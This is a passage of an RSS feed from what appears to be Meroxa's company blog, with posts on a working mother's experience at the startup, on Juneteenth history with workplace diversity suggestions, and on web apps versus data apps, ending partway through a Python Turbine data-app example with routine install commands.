&lt;p&gt;You know what else enhances the developer experience? &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;! We’re still very much in the early stages and rely on the feedback of our community to steer the project in the right direction. Try it out… if you like it join the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;discussion&lt;/a&gt; and show us some love!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Being a Meroxa Mom]]></title><description><![CDATA[Candidates are often intrigued by perks like unlimited time off and flexible hours. But do those perks actually come through once they land the job?]]></description><link>https://meroxa.com/blog/being-a-meroxa-mom</link><guid isPermaLink="false">https://meroxa.com/blog/being-a-meroxa-mom</guid><dc:creator><![CDATA[Jane Lombardi]]></dc:creator><pubDate>Wed, 29 Jun 2022 14:17:00 GMT</pubDate><content:encoded>&lt;p&gt;We’ve all been pitched or at least heard of startup companies’ “perks.” Some of them include open vacation policies, unlimited sick leave, working the hours that are best for you (“as long as you get the work done, we don’t care”), and so many more. Many candidates leave the interview process feeling excited and motivated about these “perks,” but do they actually come to fruition once they land the job?&lt;/p&gt;
&lt;p&gt;For some, yes. For others, I’m afraid no. Many companies are eager to pitch these perks, but the reality is often the complete opposite. Some employees find themselves working more hours than before, taking little to no vacation time, eating all meals in the office (because you know they are free), and working non-traditional hours to meet the demands of a hyper-growth startup.&lt;/p&gt;
&lt;p&gt;It was the Fall of 2020 when I was first introduced to DeVaris Brown, CEO of Meroxa, as they were looking for a Head of People. I had just welcomed my first baby into the world in July and, to be honest, was not eager or excited to go back to work just yet. I had endured a COVID pregnancy and had just helped a company get acquired, an event that was a 24/7 job for three months straight. I was truly a little burnt out and thought maybe it was time I took a break from my professional career and spent my time at home raising my baby girl.&lt;/p&gt;
&lt;p&gt;I preach to those I mentor the power of networking and how you should “always take the call,” as you never know how that person could impact your life now or in the future. So, I took the call. My first conversation with DeVaris was casual and informative, and it was really time used to get to know one another and understand what he was looking for. I felt our conversation was genuine. I thought he was an easy guy to talk to and thought to myself, “you know, he is probably someone I could work with.” Still, though, even after having that initial positive experience, I left not really caring about the next steps or whether he would ask me to proceed to the next rounds. (A very uncharacteristic feeling for me; hello, new mom emotions!) A few days later he reached out and asked me to do a panel interview with other Meroxa employees; I agreed to the call, and we set it up.&lt;/p&gt;
&lt;p&gt;My panel interview with the team went exceptionally well. They asked me questions I had never been asked before, they too were genuine, and I left the conversation excited. I then had a follow-up with DeVaris to really dig into the job itself and understand exactly what he needed out of this position. Note, at the time of my interviews, Meroxa only had about 12 employees. DeVaris also disclosed to me he was hiring a Head of Operations.&lt;/p&gt;
&lt;p&gt;I allowed for a few days of self-reflection before asking DeVaris for an additional conversation. During those days of self-reflection, I came to the realization that I just wasn’t ready to jump back into a full-time position. I really wanted to focus on being the best Mom to my daughter.&lt;/p&gt;
&lt;p&gt;Ultimately, I decided that during my next conversation with DeVaris, I would tell him he didn’t need a full-time Head of People just yet. My plan was to convince him to just hire me as a consultant and I could work as needed and as my busy life as a new Mom allowed. I knew I wanted to stay connected to this company as I believed in the founders, the product, and their vision. In my mind, a consultant was the perfect way to do that.&lt;/p&gt;
&lt;p&gt;On my call with DeVaris, I did just that. I gave him my whole story (as described above), and I told him I was not ready to commit to a full working day (and the hours that come with it) or to be away from my daughter at this time. He politely pushed back and asked why I couldn’t do both. He explained that he wasn’t looking to demand a 14-hour work day from me, he wasn’t going to be bugging me at 2 AM on a “fire drill” that couldn’t wait, and he wasn’t looking to micromanage how I got my work done. Ultimately, he made it very clear that he respected my first job, being a mother, as the most important job I have.&lt;/p&gt;
&lt;p&gt;Fast forward a few days, and I found myself accepting a job as the Head of People for Meroxa. Before signing, I was very clear that I wanted to be there when my daughter woke up each morning to feed her breakfast. I wanted to make her dinner at night, sit down with her at dinner, and most importantly tuck her in. This was all not only welcomed with open arms but encouraged. I felt comfortable accepting this offer because of the honest, open, and transparent conversation I was able to have with DeVaris. I’ve firsthand seen and heard of so many moms who wished for this type of work-life relationship but never had the courage to speak to their manager about it, and ultimately never saw it come to fruition. I am grateful to Meroxa and DeVaris for creating a culture where I feel comfortable expressing my needs and, most importantly, for actually honoring those needs.&lt;/p&gt;
&lt;p&gt;So, in the spirit of full transparency (because that is what we at Meroxa are all about), let’s talk about what a day in the life of Jane as a working Mom looks like. I have established clear, set “working hours” in my calendar, visible to everyone in the company. These working hours are from 10 AM-3 PM. What this means is that between 10 AM-3 PM, I have my most important meetings with my team and the rest of the company. It’s when I can guarantee a face-to-face Google Meet without a baby crying in the background or any other major type of distraction. I complete my other work, which I categorize as “admin work,” between the hours of 6 AM-8 AM before my daughter wakes up and again from 8:00 PM-10:00 PM after I put my daughter down for the night. Does this work for me? Yes. Does it work for every Mom? Maybe not. Most importantly, these hours are respected by my team and the entire Meroxa community. I feel fortunate every day to work for a company that REALLY means “family first.”&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Juneteenth — The Impact of Misinformation & Action Items for the Workplace]]></title><description><![CDATA[If you want to do more than encourage your employees to spend money at a Black-owned restaurant on Juneteenth, here are some impactful actions your company can make.]]></description><link>https://meroxa.com/blog/juneteenth-the-impact-of-misinformation-and-action-items-for-the-workplac</link><guid isPermaLink="false">https://meroxa.com/blog/juneteenth-the-impact-of-misinformation-and-action-items-for-the-workplac</guid><dc:creator><![CDATA[Idalin Bobe]]></dc:creator><pubDate>Thu, 16 Jun 2022 13:50:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Misinformation is Not New&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;People often call our current era “&lt;a href=&quot;https://yalebooks.yale.edu/book/9780300251852/the-misinformation-age/&quot;&gt;The Age of Misinformation&lt;/a&gt;” or “&lt;a href=&quot;https://www.nytimes.com/2021/05/07/world/asia/misinformation-disinformation-fake-news.html&quot;&gt;The Misinformation Era&lt;/a&gt;,” where people share alternative facts, and depending on who you know and what you read, you will absorb certain truths. However, to call misinformation new is to forget moments in American history like &lt;a href=&quot;https://nmaahc.si.edu/explore/stories/historical-legacy-juneteenth&quot;&gt;Juneteenth&lt;/a&gt; (short for “June Nineteenth”). Juneteenth marks the day when federal troops arrived in Galveston, Texas, in 1865 to ensure that all enslaved people were freed. Nearly 250,000 people were forced to remain enslaved in Texas two and a half years after President Abraham Lincoln freed enslaved people in the Confederate States through the &lt;a href=&quot;https://en.wikipedia.org/wiki/Emancipation_Proclamation&quot;&gt;Emancipation Proclamation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Juneteenth is known as “Black Freedom Day.” Sadly, Juneteenth does not represent the end of slavery in America, as it is often reported. It specifically notes the end of slavery in Texas. Slavery continued to thrive in several border states and other states unaffected by the Emancipation Proclamation, including non-Confederate states like Delaware, Maryland, Kentucky, Missouri, and West Virginia. Delaware was &lt;a href=&quot;https://whyy.org/articles/juneteenth-did-not-mean-freedom-for-delaware-slaves/&quot;&gt;the last to free its nearly 2,000&lt;/a&gt; enslaved people on December 6, 1865, six months after Texas, due to the passing of the &lt;a href=&quot;https://nmaahc.si.edu/explore/stories/13th-amendment-us-constitution-passed&quot;&gt;Thirteenth Amendment&lt;/a&gt; that officially abolished slavery throughout all of the United States. And finally, &lt;a href=&quot;https://abcnews.go.com/blogs/headlines/2013/02/mississippi-officially-abolishes-slavery-ratifies-13th-amendment&quot;&gt;in 1995&lt;/a&gt;, Mississippi was the last state to ratify the 13th Amendment.&lt;/p&gt;
&lt;p&gt;&lt;mark&gt;There is nothing wrong with commemorating Juneteenth; Black communities everywhere celebrate the holiday. However, America cannot confuse this holiday with progress and justice in the Black community.&lt;/mark&gt; For centuries, leaders like Dr. Martin Luther King Jr. fought for racial and economic justice and urgently called for the &lt;a href=&quot;https://mlkglobal.org/background-to-mlk-global-statement/&quot;&gt;redistribution of economic and political power&lt;/a&gt;. Instead, America has given Black people street signs, schools named in honor of heroes, and holidays, while people in this community still deal with voter suppression and educational, economic, and criminal injustice. If we are to celebrate Juneteenth, we must do it by organizing, learning, and demanding racial and economic justice. Without true justice, these holidays remain divorced from the systemic change needed in our society.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How to Address Misinformation and Juneteenth as a company?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;As many companies give their employees the day off, we must reflect on the labor conditions Black people have been forced to endure in America, even after they were “freed.” The Black community has had to deal with Jim Crow laws, voter suppression, police brutality, redlining, and other practices that still, to this day, impede the rights of Black people living in America. Even with Juneteenth being a federal holiday, people with high-paying salaries, mostly non-Black, will have the day off while low-income hourly workers, mostly people of color, must work.&lt;/p&gt;
&lt;p&gt;If you want to do more than encourage your employees to spend money at a Black-owned restaurant on Juneteenth, here are some other impactful actions your company can make:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Diversify your vendors and sign annual contracts with Black-owned businesses.&lt;/li&gt;
&lt;li&gt;Start an apprenticeship program for marginalized adults looking to break into your industry and partner with amazing organizations like KuraLabs, Resilient Coders, and YearUP. They can help identify and match you with potential talent.&lt;/li&gt;
&lt;li&gt;If your executive team lacks diversity, create an opportunity for marginalized people at your company to pair with your executives and train your next C-level executives. It may take a few years to take effect, but it shows your company&apos;s commitment to having a diverse succession plan.&lt;/li&gt;
&lt;li&gt;Create a scholarship fund for individuals of color in your local community to help them enter college or a trade program; it can start at $1,000.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even as you do this, many people at your company, even your leaders, may not understand the importance of supporting these types of programs because they have been impacted by generations of misinformation, an American reality. Much of America’s Black history has long been distorted. Since the country’s inception, disinformation campaigns have been used to hide the truth about the legacy of slavery. Systemic policies continue to hurt Black communities and are used to diminish the contributions Black people have made in building America. Though it is not a company’s primary function to educate its employees and community, we encourage you to create space to host educational workshops with historians who can speak on these topics, and to create an open space for dialogue around addressing misinformation.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Celebrating Juneteenth at Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;On June 20th, Meroxa will observe Juneteenth as a holiday for all of its employees (U.S. and Non-U.S.) because racial and economic justice is embedded in our company’s DNA:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;82% of leadership team members identify as a person from an underrepresented community&lt;/li&gt;
&lt;li&gt;38% of the company identifies as a woman&lt;/li&gt;
&lt;li&gt;62% of employees identify as a person of color (40% Black, 17% Latinx)&lt;/li&gt;
&lt;li&gt;24% of employees are based outside of the US&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Meroxa has a diverse team that spans the globe. That is why we hold ourselves accountable for taking time from work to understand the world, especially the social issues impacting marginalized communities. We are intentional about diversity, which is reflected in our team and vendor portfolio. And though we are a young startup, we launched our apprenticeship program in February 2022 to ensure we offer opportunities for Black and Brown people seeking to gain foundational career-building experience in the tech industry. Whether it is a holiday like Juneteenth or engaging in political education workshops, our hope at Meroxa is that our employees will continue to reflect and learn more about critical societal issues and ways to support the advancement of racial and economic justice.&lt;/p&gt;
&lt;p&gt;As we enjoy our day off, we hope to continue to share information to help build a more informed and conscious world and workforce, because the impact of misinformation has divided and polarized us for way too long.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[A Tale of Two Apps: Web Apps and Data Apps]]></title><description><![CDATA[A data app is an application that uses real-time or near-real-time events to solve a problem. ]]></description><link>https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps</link><guid isPermaLink="false">https://meroxa.com/blog/a-tale-of-two-apps-web-apps-and-data-apps</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 08 Jun 2022 19:54:00 GMT</pubDate><content:encoded>&lt;p&gt;With Web 2.0 being decades old, even those outside of the software engineering world are familiar with the term. The success of Web 2.0 has led to systems that produce unprecedented volumes of data. This deluge of data has created the need for another type of app: the data app.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A data app is an application that uses real-time or near-real-time events to solve a problem.&lt;/strong&gt; This is in contrast to web apps, which are focused on the classic and well-known HTTP request/response model. With web apps, the underlying data architecture and processing are offloaded to backend systems, separate from the frontend system with the UI for the end-user.&lt;/p&gt;
&lt;p&gt;Data apps are the perfect solution to the growing complexity of data-driven applications and the complex data architecture required to process all that data. However, there is a lot of confusion around what makes data apps different from web apps.&lt;/p&gt;
&lt;p&gt;In this article, we’ll compare web apps with data apps. We’ll look at their relationship with interaction models and how data apps might solve problems that web apps aren’t equipped to solve. We’ll close by looking at an example data app built using &lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s dive in.&lt;/p&gt;
&lt;h3&gt;What is a Web App?&lt;/h3&gt;
&lt;p&gt;Generally speaking, most developers are familiar with the concepts surrounding web apps. Web apps use the classic HTTP request and response model to interact with users and generate data from those interactions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/0*XNqIMHQrrw18pz2a&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In most cases, REST APIs, with their CRUD operations, have become the de facto approach to handling the backend data flow and interactions generated by most web applications.&lt;/p&gt;
&lt;p&gt;Most web apps are made up of a frontend, which is more UI-related and generates events and data, while the backend system of REST APIs and other supporting services deals with the processing and movement of the data.&lt;/p&gt;
&lt;h3&gt;What is a Data App?&lt;/h3&gt;
&lt;p&gt;A data app is an application that uses events to solve the same or similar data problems as the backend systems driving many web apps.&lt;/p&gt;
&lt;p&gt;Data apps are more focused, seeking primarily to solve the following technical problems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Persisting/syncing data and events between and on data infrastructure.&lt;/li&gt;
&lt;li&gt;Transforming and manipulating data between and on data infrastructure.&lt;/li&gt;
&lt;li&gt;Other common data processing tasks between and on data infrastructure.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In most web apps, the core functionality is often to create, consume, or present data. Data apps are a natural evolution towards better design, architecture, and support for the high-volume data-driven software world many developers and engineers find themselves in.&lt;/p&gt;
&lt;h3&gt;Data apps and architecture&lt;/h3&gt;
&lt;p&gt;One important aspect of a data app that distinguishes it from a web app is&lt;strong&gt;the tightening of concerns between infrastructure and code&lt;/strong&gt;. While web apps typically involve both a front-end layer and a back-end layer, data apps operate on the back-end only, interacting directly with the data infrastructure. With the common use cases of real-time or near real-time data, the complexity of the code and the architecture built to support these high-volume data sets has become a serious burden and hurdle for many developers.&lt;/p&gt;
&lt;h3&gt;Interaction Models&lt;/h3&gt;
&lt;p&gt;Before diving further into data apps, let’s take a side tour of a topic related to software design: interaction models. In this context, interaction models can help us understand the fundamental differences between web apps and data apps. We’ll look at the two major types of interaction models: user-to-system interactions and system-to-system interactions.&lt;/p&gt;
&lt;h3&gt;User-to-system interaction models&lt;/h3&gt;
&lt;p&gt;User-to-system interaction models are common in the software design of web apps. With the rise in popularity of UX design, we’ve seen an increased emphasis on the interaction between the end-user and the system (the web app).&lt;/p&gt;
&lt;p&gt;In this context, software design is all about modeling the system in a way that helps the end-user interact with the application to perform certain tasks. This could simply be the way a user navigates and interacts with a page or performs certain actions and updates to the system.&lt;/p&gt;
&lt;h3&gt;System-to-system interaction models&lt;/h3&gt;
&lt;p&gt;On the other hand, the system-to-system interaction model has an entirely different goal in mind. System-to-system interactions are often&lt;strong&gt;modeled around how different pieces of infrastructure interact and work together to analyze and process data&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Consider a real-world example: a continuous incoming stream of user clicks from a frontend system that must be processed and made available in a company’s Data Lake for analysis by downstream business units.&lt;/p&gt;
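To make that example concrete, here is a framework-free Python sketch of one system-to-system step (all names are invented for illustration; this is not the Turbine API): a transform that reshapes raw click events into flat, analytics-friendly records before they land in a Data Lake.

```python
from datetime import datetime, timezone


def to_lake_record(click: dict) -> dict:
    """Reshape one raw click event into a flat, analytics-friendly record.

    Drops fields downstream business units don't need (e.g. session
    internals) and normalizes the timestamp to ISO 8601 UTC.
    """
    ts = datetime.fromtimestamp(click["ts_epoch_ms"] / 1000, tz=timezone.utc)
    return {
        "user_id": click["user_id"],
        "page": click["page"],
        "clicked_at": ts.isoformat(),
    }


if __name__ == "__main__":
    raw = {
        "user_id": "u-42",
        "page": "/pricing",
        "ts_epoch_ms": 1654711200000,
        "session_blob": "...",  # extra field; the transform drops it
    }
    print(to_lake_record(raw))
```

A data app framework's job is to run a function like this against a continuous stream and handle the infrastructure concerns (sources, destinations, scaling) around it.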
&lt;h3&gt;Closing the gap between web and data apps&lt;/h3&gt;
&lt;p&gt;For today’s web apps, a common area of complexity and limitation centers around the system-to-system interaction model. While web apps thrive at addressing user-to-system interactions, the lines can get blurry when it comes to processing the data generated by those interactions.&lt;/p&gt;
&lt;p&gt;At a high level, many questions arise when engineers and developers try to hash out responsibilities when it comes to data processing. How much data transformation and handling can be done by the web app? Should the web app do any of it, or should all data be handed off to other systems to process?&lt;/p&gt;
&lt;p&gt;As an example, the engineers working on web apps typically aren’t deeply familiar with the complexities of streaming data processing. Often, this sort of work is handed off to another backend system and a team that is responsible for data processing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can data apps solve these complex data processing problems while retaining the familiarity of web apps in code and project structure?&lt;/strong&gt; One of those ways is with &lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;turbine-py&lt;/a&gt;, a Python package built specifically for creating data apps.&lt;/p&gt;
&lt;p&gt;But first, let’s dive into the benefits that data apps provide and how they help engineers solve complex data processing problems.&lt;/p&gt;
&lt;h3&gt;How Data Apps Solve Problems&lt;/h3&gt;
&lt;p&gt;It’s well known that streaming with real-time or near-real-time data processing is important for modern data processing applications, but it’s also incredibly complicated. Data apps solve these issues by abstracting away the complexity of the underlying streaming infrastructure.&lt;/p&gt;
&lt;p&gt;Data apps are built in such a way that they can handle event-driven streams of data, respond in real-time, and scale to use cloud-native best practices. Engineers can focus on building applications that solve complex problems rather than worrying about the complexity of processing streaming data or the infrastructure needed to support those technologies. Typically, managing these technologies correctly requires a dedicated team of engineers.&lt;/p&gt;
&lt;h3&gt;Benefits of Data Apps&lt;/h3&gt;
&lt;p&gt;Data apps — like those built with Turbine — have several benefits that extend from this reduction of complexity.&lt;/p&gt;
&lt;p&gt;First, by allowing developers to focus on code rather than on managing complex infrastructure and cloud-related operations, data apps free up time and energy for developers so that they can focus on the code that matters: the application code itself.&lt;/p&gt;
&lt;p&gt;Also, the speed at which new engineers can become familiar with and contribute to codebases increases dramatically. When less time is spent understanding streaming architecture and managing those resources, more effort can be spent on the core of the application logic.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Let’s look at a simple data app built using Turbine to see these benefits in action.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;Example of a Data App Using Turbine&lt;/h3&gt;
&lt;p&gt;Currently, Turbine data apps can be written with &lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt;. In this example, we will use Python. We’ll solve a data processing problem that is common for many organizations.&lt;/p&gt;
&lt;p&gt;In our sample problem, we have streaming records generated by our users in a web app, and those records need to be processed into a Data Lake, with transformation applied for later analytics by business users.&lt;/p&gt;
&lt;p&gt;Turbine fits the use case for this problem perfectly, providing a data app framework for responding to real-time data while being able to scale in the cloud.&lt;/p&gt;
&lt;h3&gt;Tooling setup&lt;/h3&gt;
&lt;p&gt;First, we install the Meroxa CLI to help with the scaffolding of a Turbine data app. We follow these &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;installation instructions&lt;/a&gt;. We &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SB3aGZKOHhRaFhsTkJPTTV5VTd2ajhta1M1bHZpSmpWYqFupWxvZ2luo3RpZNkgWlFfc0pjdGFDR3R3NzYzZ3RjVTlONjgxMVFZNDUxN3mjY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=TUhfNWw5cUlDYldaUGZxbmp3SzhUdV8tWlZvaUVhTko1YnNzTmI2N3otUQ%3D%3D&amp;#x26;code_challenge=13yK1_pys2HgZOj47HTpiSnmEmTt24WBFTQbiLlioUg&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;set up our Meroxa account&lt;/a&gt; and then log in via the CLI.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;brew tap meroxa/taps&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; brew &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; meroxa&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we install the &lt;em&gt;turbine-py&lt;/em&gt; package. Then, we initialize our Python data app, creating a clean template.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;pip3 &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; turbine-py&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app init data-warehouse --lang python --path ~/src&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to start developing our Python data app! When we initialized our app, the following files were automatically generated for us as our template:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;- main.py
- app.json
- __init__.py
- fixtures
  - demo-cdc.json
  - demo-no-cdc.json&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Writing our first Turbine data app&lt;/h3&gt;
&lt;p&gt;There are five important concepts for writing Turbine data apps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Turbine class (provides needed functionality)&lt;/li&gt;
&lt;li&gt;Data processing function(s)&lt;/li&gt;
&lt;li&gt;Resources (datastores)&lt;/li&gt;
&lt;li&gt;Records (collection of data)&lt;/li&gt;
&lt;li&gt;Write (push data out)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;strong&gt;Turbine class&lt;/strong&gt; itself provides access to the necessary components to build your data app with minimal code. Of course, you will have one or more &lt;strong&gt;data processing functions&lt;/strong&gt; or methods to apply transformations to your records.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Resources&lt;/strong&gt; in Turbine allow you to connect to your data sources. &lt;strong&gt;Records&lt;/strong&gt; are simply a collection of data that your data app will process. Lastly, &lt;strong&gt;writing&lt;/strong&gt; will push the processed data back out of the data app. You can &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview/#configuration&quot;&gt;configure&lt;/a&gt; your Resources and Destinations in Meroxa.&lt;/p&gt;
&lt;p&gt;Since we don’t need to worry about the complexity of consuming a stream of records or the technical requirements related to the source streaming technology, we can focus on writing the transformation function that takes individual records and transforms them as needed.&lt;/p&gt;
&lt;h3&gt;Writing the Code&lt;/h3&gt;
&lt;p&gt;We will write the code for our data app in &lt;code class=&quot;language-text&quot;&gt;main.py&lt;/code&gt;, which will be our entry point.&lt;/p&gt;
&lt;p&gt;First, we will import the needed Python packages into our &lt;code class=&quot;language-text&quot;&gt;main.py&lt;/code&gt; code.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Turbine
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Record
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; typing &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; t&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we will write our Python class that inherits from the Turbine class to process our streaming user records.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;DataLake&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@staticmethod&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&quot;user_activity&quot;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&quot;click_stream&quot;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; transform&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        destination_db &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&quot;data_lake&quot;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination_db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &quot;user_analytics&quot;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This class is straightforward to follow, as the Turbine data app abstracts away the details of complex stream processing. There are four simple steps encapsulated inside our &lt;strong&gt;run&lt;/strong&gt; method.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Connect to a Meroxa-configured &lt;strong&gt;source&lt;/strong&gt; system.&lt;/li&gt;
&lt;li&gt;Pull streaming &lt;strong&gt;records&lt;/strong&gt; from the source.&lt;/li&gt;
&lt;li&gt;Transform the streaming records as needed, yielding the set of &lt;strong&gt;processed&lt;/strong&gt; records.&lt;/li&gt;
&lt;li&gt;Connect to a Meroxa-configured &lt;strong&gt;destination&lt;/strong&gt; to &lt;strong&gt;write&lt;/strong&gt; our processed records.&lt;/li&gt;
&lt;/ol&gt;
